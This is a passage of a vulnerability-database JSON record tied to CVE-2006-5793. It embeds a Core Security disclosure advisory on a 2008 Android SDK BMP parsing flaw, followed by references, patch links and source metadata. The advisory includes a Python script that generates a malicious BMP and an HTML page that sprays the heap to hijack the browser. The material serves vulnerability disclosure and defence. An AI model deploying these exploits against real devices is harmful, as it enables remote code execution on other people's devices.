ImageDecoder::Mode)\u0027 inside the \u0027libsgl.so\u0027 library. When the\nvalue of the \u0027offset\u0027 field of the BMP file header is negative and the\nBitmap Information section (DIB header) specifies an image of 8 bits per\npixel (8 bpp) the parser will try to allocate a palette, and will use\nthe negative offset to calculate the size of the palette. \n\n The following code initializes the palette with the color white\n(\u00270x00ffffff\u0027) but with a carefully chosen negative offset it can be\nmade to overwrite any address of the process with that value. Because\nthe BMP decoder source wasn\u0027t released, a disassembly of the binary\nincluded by Android is provided below:\n\n/-----------\n\n.text:0002EE38 MOV LR, R7 ; R7 is the negative offset\n.text:0002EE3C MOV R12, R7,LSL#2\n.text:0002EE40\n.text:0002EE40 loc_2EE40\n.text:0002EE40 LDR R3, [R10,#0x10]\n.text:0002EE44 ADD LR, LR, #1\n.text:0002EE48 MOVL R2, 0xFFFFFFFF\n.text:0002EE4C ADD R1, R12, R3 ; R3 is uninitialized (because of the\nsame bug) but ranges 0x10000-0x20000\n.text:0002EE50 MOV R0, #0\n.text:0002EE54 CMP LR, R9\n.text:0002EE58 STRB R2, [R12,R3] ;Write 0x00ffffff to R12+13 (equals R1)\n.text:0002EE5C STRB R2, [R1,#2]\n.text:0002EE60 STRB R0, [R1,#3]\n.text:0002EE64 STRB R2, [R1,#1]\n.text:0002EE68 ADD R12, R12, #4\n.text:0002EE6C BNE loc_2EE40\n- -----------/\n\n Now, if let\u0027s take a look at the memory map of the Android browser:\n\n/-----------\n\n# ps\nps\nUSER PID PPID VSIZE RSS WCHAN PC NAME\nroot 1 0 248 64 c0084edc 0000ae2c S /init\nroot 2 0 0 0 c0049168 00000000 S kthreadd\n... \nroot 1206 1165 16892 14564 c0084edc 00274af8 S ./gdb\napp_0 1574 535 83564 12832 ffffffff afe0c79c S\ncom.google.android.browser\nroot 1600 587 840 324 00000000 afe0bfbc R ps\n# cat /proc/1574/maps\ncat /proc/1574/maps\n00008000-0000a000 rwxp 00000000 1f:00 514 /system/bin/app_process\n0000a000-00c73000 rwxp 0000a000 00:00 0 [heap]\n08000000-08001000 rw-s 00000000 00:08 344 /dev/zero (deleted)\n... \n#\n- -----------/\n\n We can see that the heap is located in the range \u00270000a000-00c73000\u0027\nand it is executable. Overwriting this area will allow to redirect\nexecution flow if there is a virtual table stored in the heap. Later on\nthe same method we can see that a call to the \"Stream\" Object VT is made:\n\n/-----------\n\n.text:0002EB64 LDR R12, [R8] # R8 is the \"this\" pointer of the Stream Object\n.text:0002EB68 MOV R0, R8\n.text:0002EB6C MOV LR, PC\n.text:0002EB70 LDR PC, [R12,#0x10] # A call is made to Stream+0x10\n- -----------/\n\n Because the \"Stream\" Object (R8) is stored on the heap and we can fill\nthe heap with the white color \u0027\n 0x00ffffff\u0027 we can load the Program Counter with the value at\n\u00270xffffff+0x10\u0027. The following python script will generate a BMP to\naccomplish that:\n\n/-----------\n\n# This script generates a Bitmap file that makes the Android browser\njump to the address at 0xffffff+0x10\n# Must be loaded inside a HTML file with a tag like this: \u0026lt;IMG\nsrc=badbmp.bmp\u0026gt;\n# Alfredo Ortega - Core Security\nimport struct\n\noffset = 0xffef0000\nwidth = 0x0bffff\nheight=8\n\nbmp =\"\\x42\\x4d\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\nbmp+=struct.pack(\"\u003cI\",offset)\nbmp+=\"\\x28\\x00\\x00\\x00\"\nbmp+=struct.pack(\"\u003cI\",width)\nbmp+=struct.pack(\"\u003cI\",height)\nbmp+=\"\\x03\\x00\\x08\\x00\\x00\\x00\"\nbmp+=\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\nbmp+=\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x55\\x02\\xff\\x00\\x02\\x00\\x02\\x02\\xff\"\nbmp+=\"\\xff\\x11\\xff\\x33\\xff\\x55\\xff\\x66\\xff\\x77\\xff\\x88\\x41\\x41\\x41\\x41\"\nbmp+=\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\nbmp+=\"\\x41\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\"\nbmp+=\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\"\nopen(\"badbmp.bmp\",\"wb\").write(bmp)\n- -----------/\n\n Opening the BMP file generated with this script inside a HTML page will\ncause (sometimes, as it is dependent on an uninitialized variable) the\nfollowing output of the gdb debugger:\n\n/-----------\n\n(gdb) attach 1574\nattach 1574\nAttaching to program: /system/bin/app_process, process 1574\n... \n0xafe0d204 in __futex_wait () from /system/lib/libc.so\n(gdb) c\nContinuing. \n\nProgram received signal SIGSEGV, Segmentation fault. \n0x00000000 in ?? ()\n(gdb)\n- -----------/\n\n Here the browser process has jumped to the \u00270x00000000\u0027 address because\nthat is the value at 0x00ffffff+0x10. We can change this value using\ncommon JavaScript heap-filling techniques. \n\n The complete exploit page follows:\n\n/-----------\n\n\u003cHTML\u003e\n\u003cHEAD\u003e\n\u003c/HEAD\u003e\n\u003cBODY\u003e\n\u003cscript type=\"text/javascript\"\u003e\n// Fill 0x200000 - 0xa00000 with Breakpoints\nvar nop = unescape(\"%u0001%uef9f\");\nwhile (nop.length \u003c= 0x100000/2) nop += nop;\nvar i = 0;\nfor (i = 0;i\u003c5;i++)\n document.write(nop)\n\n// Fill 0xa00000 - 0x1100000 with address 0x00400040\nvar nop = unescape(\"%u4000%u4000\");\nwhile (nop.length \u003c= 0x100000/2) nop += nop;\nvar i = 0;\nfor (i = 0;i\u003c2;i++)\n document.write(nop)\n\u003c/script\u003e\n\u003cIMG src=badbmp.bmp\u003e\n\u003c/BODY\u003e\n\u003c/HTML\u003e\n- -----------/\n\n Because the exploit needs to fill over 16 MB of heap memory to reach\nthe address \u00270xffffff\u0027 it is very slow and the default memory\nconfiguration of Android will often abort the process before reaching\nthe desired point. To overcome this limitation for demonstration\npurposes one can launch the emulator with this parameters:\n\n\u0027emulator -qemu -m 192\u0027\n\n That will launch the Android emulator with 192 megabytes of memory,\nplenty for the exploit to work. \n\n This security bug affects Android SDK m5-rc14 and earlier versions. \n\n\n*Report Timeline*\n\n. 2008-01-30: Vendor is notified that possibly exploitable\nvulnerabilities where discovered and that an advisory draft is\navailable. This affects Android SDK m3-rc37a and earlier versions. 2008-01-30: Vendor acknowledges and requests the draft. 2008-01-31: Core sends the draft encrypted, including PoC code to\ngenerate malformed GIF images. 2008-01-31: Vendor acknowledges the draft. 2008-02-02: Vendor notifies that the software is an early release for\nthe open source community, but agree they can fix the problem on the\nestimated date (2008-02-25). 2008-02-04: Core notifies the vendor that Android is using a\nvulnerable PNG processing library. 2008-02-08: Vendor acknowledges, invites Core to send any new\nfindings and asks if all findings will be included in the advisory. 2008-02-12: Core responds to vendor that all security issues found\nwill be included in the advisory, the date is subject to coordination. 2008-02-12: Vendor releases version m5-rc14 of the Android SDK. Core\nreceives no notification. 2008-02-13: Core sends the vendor more malformed images, including\nGIF, PNG and BMP files. Only the BMP file affects the m5-rc14 release. 2008-02-20: Core sends to the vendor a new version of the advisory,\nincluding a BMP PoC that runs arbitrary ARM code and informs the vendor\nthat we noticed that the recent m5-rc14 release fixed the GIF and PNG\nbugs. Publication of CORE-2008-0124 has been re-=scheduled for February\n27th. 2008. 2008-02-21: Vendor confirms that the GIF and PNG fixes have been\nreleased and provides an official statement to the \"Vendor Section\" of\nthe advisory. A final review of the advisory is requested before its\nrelease. The vendor indicates that the Android SDK is still in\ndevelopment and stabilization won\u0027t happen until it gets closer to\nAlpha. Changes to fix the BMP issue are coming soon, priorities are\ngiven to issues listed in the public issue tracking system at\nhttp://code.google.com/p/android/issues . 2008-02-26: Core indicates that publication of CORE-2008-0124 has\nbeen moved to March 3rd 2008, asks if an estimated date for the BMP fix\nis available and if Core should file the reported and any future bugs\nin the public issue tracking page. 2008-02-29: Final draft version of advisory CORE-2008-0124 is sent to\nthe vendor as requested. Core requests for any additional comments or\nstatements to be provided by noon March 3rd, 2008 (UTC-5)\n. 2008-03-01: Vendor requests publication to be delayed one day in\norder to publish a new release of Android with a fix to the BMP issue. 2008-03-02: Core agrees to delay publication for one day. 2008-03-03: Vendor releases Android SDK m5-rc15 which fixes the BMP\nvulnerability. Vendor indicates that Android applications run with\nthe credentials of an unprivileged user which decreases the severity of\nthe issues found\n. 2008-03-04: Further research by Alfredo Ortega reveals that although\nthe vendor statement is correct current versions of Android SDK ship\nwith a passwordless root account. Unprivileged users with shell access\ncan simply use the \u0027su\u0027 program to gain privileges\n. 2008-03-04: Advisory CORE-2008-0124 is published. \n\n\n*References*\n\n[1] Android Overview - Open Handset Alliance -\nhttp://www.openhandsetalliance.com/android_overview.html\n[2] \"Android Comes to Life in Barcelona\" - The Washington Post ,\nFebruary 11th, 2008 -\nhttp://www.washingtonpost.com/wp-dyn/content/article/2008/02/11/AR2008021101944.html\n[3] Android Developer Challenge - http://code.google.com/android/adc.html\n[4] \"Test Center Preview: Inside Google\u0027s Mobile future\" - Inforworld,\nFeb. 27th 2008 -\nhttp://www.infoworld.com/article/08/02/27/09TC-google-android_1.html\n[5] \"\u0027Allo, \u0027allo, Android\" - The Sydney Morning Herald, February 26th,\n2008\nhttp://www.smh.com.au/news/biztech/allo-allo-android/2008/02/26/1203788290737.html\n[6] The Shellcoder\u0027s Handbook: Discovering and Exploiting Security Holes\nby Chris Anley , John Heasman , Felix Linder and Gerardo Richarte. \nWiley; 2nd edition (August 20, 2007) -\nhttp://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html\n[7] Graphics Interchange Format version 89a -\nhttp://www.w3.org/Graphics/GIF/spec-gif89a.txt\n[8] Android downloads page http://code.google.com/p/android/downloads/list\n[9] Portable Network Graphics (PNG) specification -\nhttp://www.w3.org/TR/PNG/\n[10] Bitmap File Structures - http://www.digicamsoft.com/bmp/bmp.html\n\n\n*About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://www.coresecurity.com/corelabs/. \n\n\n*About Core Security Technologies*\n\nCore Security Technologies develops strategic solutions that help\nsecurity-conscious organizations worldwide develop and maintain a\nproactive process for securing their networks. The company\u0027s flagship\nproduct, CORE IMPACT, is the most comprehensive product for performing\nenterprise security assurance testing. CORE IMPACT evaluates network,\nendpoint and end-user vulnerabilities and identifies what resources are\nexposed. It enables organizations to determine if current security\ninvestments are detecting and preventing attacks. Core Security\nTechnologies augments its leading technology solution with world-class\nsecurity consulting services, including penetration testing and software\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\nhttp://www.coresecurity.com. \n\n\n*Disclaimer*\n\nThe contents of this advisory are copyright (c) 2008 Core Security\nTechnologies and (c) 2008 CoreLabs, and may be distributed freely\nprovided that no fee is charged for this distribution and proper credit\nis given. \n\n\n*GPG/PGP Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. \n\n\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.6 (MingW32)\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\n\niD8DBQFHzZRwyNibggitWa0RAjbdAJ9YztTFlDK9a3YOxAx5avoXQV5LhgCeMs6I\nteV3ahcSAUFEtsaRCeXVuN8=\n=u35s\n-----END PGP SIGNATURE-----\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2006-5793"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000961"
},
{
"db": "BID",
"id": "21078"
},
{
"db": "PACKETSTORM",
"id": "52280"
},
{
"db": "PACKETSTORM",
"id": "70882"
},
{
"db": "PACKETSTORM",
"id": "52284"
},
{
"db": "PACKETSTORM",
"id": "52286"
},
{
"db": "PACKETSTORM",
"id": "52287"
},
{
"db": "PACKETSTORM",
"id": "64260"
},
{
"db": "PACKETSTORM",
"id": "52285"
}
],
"trust": 2.52
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2006-5793",
"trust": 3.3
},
{
"db": "BID",
"id": "21078",
"trust": 2.7
},
{
"db": "SECUNIA",
"id": "22900",
"trust": 2.4
},
{
"db": "SECTRACK",
"id": "1017244",
"trust": 2.4
},
{
"db": "SECUNIA",
"id": "22950",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "22956",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "23208",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "25329",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "22889",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "23335",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "22951",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "25742",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "29420",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "22958",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "22941",
"trust": 1.6
},
{
"db": "VUPEN",
"id": "ADV-2006-4521",
"trust": 1.6
},
{
"db": "VUPEN",
"id": "ADV-2008-0924",
"trust": 1.6
},
{
"db": "VUPEN",
"id": "ADV-2006-4568",
"trust": 1.6
},
{
"db": "XF",
"id": "30290",
"trust": 1.4
},
{
"db": "USCERT",
"id": "TA08-079A",
"trust": 0.8
},
{
"db": "USCERT",
"id": "SA08-079A",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000961",
"trust": 0.8
},
{
"db": "MANDRIVA",
"id": "MDKSA-2006:212",
"trust": 0.6
},
{
"db": "MANDRIVA",
"id": "MDKSA-2006:211",
"trust": 0.6
},
{
"db": "MANDRIVA",
"id": "MDKSA-2006:210",
"trust": 0.6
},
{
"db": "MANDRIVA",
"id": "MDKSA-2006:209",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20080304 CORE-2008-0124: MULTIPLE VULNERABILITIES IN GOOGLE\u0027S ANDROID SDK",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20061204 RPSA-2006-0211-2 DOXYGEN LIBPNG",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20061115 RPSA-2006-0211-1 LIBPNG",
"trust": 0.6
},
{
"db": "OPENPKG",
"id": "OPENPKG-SA-2006.036",
"trust": 0.6
},
{
"db": "UBUNTU",
"id": "USN-383-1",
"trust": 0.6
},
{
"db": "SUSE",
"id": "SUSE-SR:2006:028",
"trust": 0.6
},
{
"db": "TRUSTIX",
"id": "2006-0065",
"trust": 0.6
},
{
"db": "REDHAT",
"id": "RHSA-2007:0356",
"trust": 0.6
},
{
"db": "APPLE",
"id": "APPLE-SA-2008-03-18",
"trust": 0.6
},
{
"db": "GENTOO",
"id": "GLSA-200611-09",
"trust": 0.6
},
{
"db": "SLACKWARE",
"id": "SSA:2006-335-03",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-200611-295",
"trust": 0.6
},
{
"db": "SECUNIA",
"id": "32213",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "52280",
"trust": 0.1
},
{
"db": "JVN",
"id": "JVN30732239",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "70882",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "52284",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "52286",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "52287",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "64260",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "52285",
"trust": 0.1
}
],
"sources": [
{
"db": "BID",
"id": "21078"
},
{
"db": "PACKETSTORM",
"id": "52280"
},
{
"db": "PACKETSTORM",
"id": "70882"
},
{
"db": "PACKETSTORM",
"id": "52284"
},
{
"db": "PACKETSTORM",
"id": "52286"
},
{
"db": "PACKETSTORM",
"id": "52287"
},
{
"db": "PACKETSTORM",
"id": "64260"
},
{
"db": "PACKETSTORM",
"id": "52285"
},
{
"db": "CNNVD",
"id": "CNNVD-200611-295"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000961"
},
{
"db": "NVD",
"id": "CVE-2006-5793"
}
]
},
"id": "VAR-200611-0210",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.96590906
},
"last_update_date": "2026-03-09T20:12:57.197000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Security Update 2008-002",
"trust": 0.8,
"url": "http://support.apple.com/kb/HT1249"
},
{
"title": "Security Update 2008-002",
"trust": 0.8,
"url": "http://support.apple.com/kb/HT1249?viewlocale=ja_JP"
},
{
"title": "15 November 2006",
"trust": 0.8,
"url": "http://libpng.sourceforge.net/libpng-1.2.12-ADVISORY.txt"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.libpng.org/"
},
{
"title": "1511",
"trust": 0.8,
"url": "http://www.miraclelinux.com/support/index.php?q=node/99\u0026errata_id=1511"
},
{
"title": "1023",
"trust": 0.8,
"url": "http://www.miraclelinux.com/support/index.php?q=node/99\u0026errata_id=1023"
},
{
"title": "RHSA-2007:0356",
"trust": 0.8,
"url": "https://rhn.redhat.com/errata/RHSA-2007-0356.html"
},
{
"title": "TLSA-2007-45",
"trust": 0.8,
"url": "http://www.turbolinux.com/security/2007/TLSA-2007-45.txt"
},
{
"title": "TLSA-2007-49",
"trust": 0.8,
"url": "http://www.turbolinux.com/security/2007/TLSA-2007-49.txt"
},
{
"title": "RHSA-2007:0356",
"trust": 0.8,
"url": "http://www.jp.redhat.com/support/errata/RHSA/RHSA-2007-0356J.html"
},
{
"title": "TLSA-2007-45",
"trust": 0.8,
"url": "http://www.turbolinux.co.jp/security/2007/TLSA-2007-45j.txt"
},
{
"title": "TLSA-2007-49",
"trust": 0.8,
"url": "http://www.turbolinux.co.jp/security/2007/TLSA-2007-49j.txt"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2006-000961"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-20",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-5793"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.4,
"url": "http://www.securityfocus.com/bid/21078"
},
{
"trust": 2.4,
"url": "http://securitytracker.com/id?1017244"
},
{
"trust": 1.9,
"url": "http://bugs.gentoo.org/show_bug.cgi?id=154380"
},
{
"trust": 1.9,
"url": "http://support.avaya.com/elmodocs2/security/asa-2007-254.htm"
},
{
"trust": 1.9,
"url": "https://issues.rpath.com/browse/rpl-790"
},
{
"trust": 1.7,
"url": "http://security.gentoo.org/glsa/glsa-200611-09.xml"
},
{
"trust": 1.7,
"url": "http://www.coresecurity.com/?action=item\u0026id=2148"
},
{
"trust": 1.6,
"url": "http://www.ubuntu.com/usn/usn-383-1"
},
{
"trust": 1.6,
"url": "http://sourceforge.net/project/shownotes.php?release_id=464278"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/22958"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/22956"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/22900"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/22889"
},
{
"trust": 1.6,
"url": "http://bugs.gentoo.org/attachment.cgi?id=101400\u0026action=view"
},
{
"trust": 1.6,
"url": "http://www.trustix.org/errata/2006/0065/"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/22951"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/22950"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/22941"
},
{
"trust": 1.6,
"url": "https://issues.rpath.com/browse/rpl-824"
},
{
"trust": 1.6,
"url": "http://www.redhat.com/support/errata/rhsa-2007-0356.html"
},
{
"trust": 1.6,
"url": "http://www.openpkg.com/security/advisories/openpkg-sa-2006.036.html"
},
{
"trust": 1.6,
"url": "http://www.novell.com/linux/security/advisories/2006_28_sr.html"
},
{
"trust": 1.6,
"url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:212"
},
{
"trust": 1.6,
"url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:211"
},
{
"trust": 1.6,
"url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:210"
},
{
"trust": 1.6,
"url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:209"
},
{
"trust": 1.6,
"url": "http://slackware.com/security/viewer.php?l=slackware-security\u0026y=2006\u0026m=slackware-security.465035"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/29420"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25742"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25329"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/23335"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/23208"
},
{
"trust": 1.6,
"url": "http://lists.apple.com/archives/security-announce/2008/mar/msg00001.html"
},
{
"trust": 1.6,
"url": "http://docs.info.apple.com/article.html?artnum=307562"
},
{
"trust": 1.4,
"url": "http://xforce.iss.net/xforce/xfdb/30290"
},
{
"trust": 1.4,
"url": "http://www.frsirt.com/english/advisories/2006/4521"
},
{
"trust": 1.2,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-5793"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/archive/1/453484/100/100/threaded"
},
{
"trust": 1.0,
"url": "http://www.vupen.com/english/advisories/2006/4568"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/archive/1/489135/100/0/threaded"
},
{
"trust": 1.0,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a10324"
},
{
"trust": 1.0,
"url": "http://android-developers.blogspot.com/2008/03/android-sdk-update-m5-rc15-released.html"
},
{
"trust": 1.0,
"url": "http://www.vupen.com/english/advisories/2006/4521"
},
{
"trust": 1.0,
"url": "http://www.vupen.com/english/advisories/2008/0924/references"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/30290"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/archive/1/451874/100/200/threaded"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnta08-079a/index.html"
},
{
"trust": 0.8,
"url": "http://jvn.jp/tr/trta08-079a/index.html"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2006-5793"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/22900/"
},
{
"trust": 0.8,
"url": "http://www.us-cert.gov/cas/alerts/sa08-079a.html"
},
{
"trust": 0.8,
"url": "http://www.us-cert.gov/cas/techalerts/ta08-079a.html"
},
{
"trust": 0.6,
"url": "http://frontal2.mandriva.com/security/advisories?name=mdksa-2006:212"
},
{
"trust": 0.6,
"url": "http://frontal2.mandriva.com/security/advisories?name=mdksa-2006:211"
},
{
"trust": 0.6,
"url": "http://frontal2.mandriva.com/security/advisories?name=mdksa-2006:210"
},
{
"trust": 0.6,
"url": "http://frontal2.mandriva.com/security/advisories?name=mdksa-2006:209"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2006/4568"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/489135/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/453484/100/100/threaded"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/451874/100/200/threaded"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2008/0924/references"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2006-5793"
},
{
"trust": 0.4,
"url": "http://www.mandriva.com/security/"
},
{
"trust": 0.4,
"url": "http://www.mandriva.com/security/advisories"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2006-3334"
},
{
"trust": 0.4,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-3334"
},
{
"trust": 0.3,
"url": "http://www.libpng.org/pub/png/libpng.html"
},
{
"trust": 0.3,
"url": "http://rhn.redhat.com/errata/rhsa-2007-0356.html"
},
{
"trust": 0.2,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-0599"
},
{
"trust": 0.2,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2002-1363"
},
{
"trust": 0.2,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-0421"
},
{
"trust": 0.2,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-0598"
},
{
"trust": 0.2,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-0597"
},
{
"trust": 0.1,
"url": "http://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "http://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/32213/"
},
{
"trust": 0.1,
"url": "http://secunia.com/binary_analysis/sample_analysis/"
},
{
"trust": 0.1,
"url": "http://jvn.jp/en/jp/jvn30732239/index.html"
},
{
"trust": 0.1,
"url": "https://issues.apache.org/bugzilla/show_bug.cgi?id=25835"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/product/328/"
},
{
"trust": 0.1,
"url": "http://tomcat.apache.org/security-5.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/product/3571/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://tomcat.apache.org/security-4.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/"
},
{
"trust": 0.1,
"url": "http://www.digicamsoft.com/bmp/bmp.html"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-5266"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-2445"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-5267"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-5269"
},
{
"trust": 0.1,
"url": "http://code.google.com/android/adc.html"
},
{
"trust": 0.1,
"url": "http://enigmail.mozdev.org"
},
{
"trust": 0.1,
"url": "http://www.washingtonpost.com/wp-dyn/content/article/2008/02/11/ar2008021101944.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-0986"
},
{
"trust": 0.1,
"url": "http://www.infoworld.com/article/08/02/27/09tc-google-android_1.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-0985"
},
{
"trust": 0.1,
"url": "http://www.w3.org/tr/png/"
},
{
"trust": 0.1,
"url": "http://www.smh.com.au/news/biztech/allo-allo-android/2008/02/26/1203788290737.html"
},
{
"trust": 0.1,
"url": "http://code.google.com/p/android/issues"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/corelabs"
},
{
"trust": 0.1,
"url": "http://lists.grok.org.uk/full-disclosure-charter.html"
},
{
"trust": 0.1,
"url": "http://www.wiley.com/wileycda/wileytitle/productcd-047008023x.html"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "http://www.openhandsetalliance.com/android_overview.html"
},
{
"trust": 0.1,
"url": "http://www.w3.org/graphics/gif/spec-gif89a.txt"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/corelabs/."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-5268"
},
{
"trust": 0.1,
"url": "http://code.google.com/p/android/downloads/list"
}
],
"sources": [
{
"db": "BID",
"id": "21078"
},
{
"db": "PACKETSTORM",
"id": "52280"
},
{
"db": "PACKETSTORM",
"id": "70882"
},
{
"db": "PACKETSTORM",
"id": "52284"
},
{
"db": "PACKETSTORM",
"id": "52286"
},
{
"db": "PACKETSTORM",
"id": "52287"
},
{
"db": "PACKETSTORM",
"id": "64260"
},
{
"db": "PACKETSTORM",
"id": "52285"
},
{
"db": "CNNVD",
"id": "CNNVD-200611-295"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000961"
},
{
"db": "NVD",
"id": "CVE-2006-5793"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "BID",
"id": "21078",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "52280",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "70882",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "52284",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "52286",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "52287",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "64260",
"ident": null
},
{
"db": "PACKETSTORM",
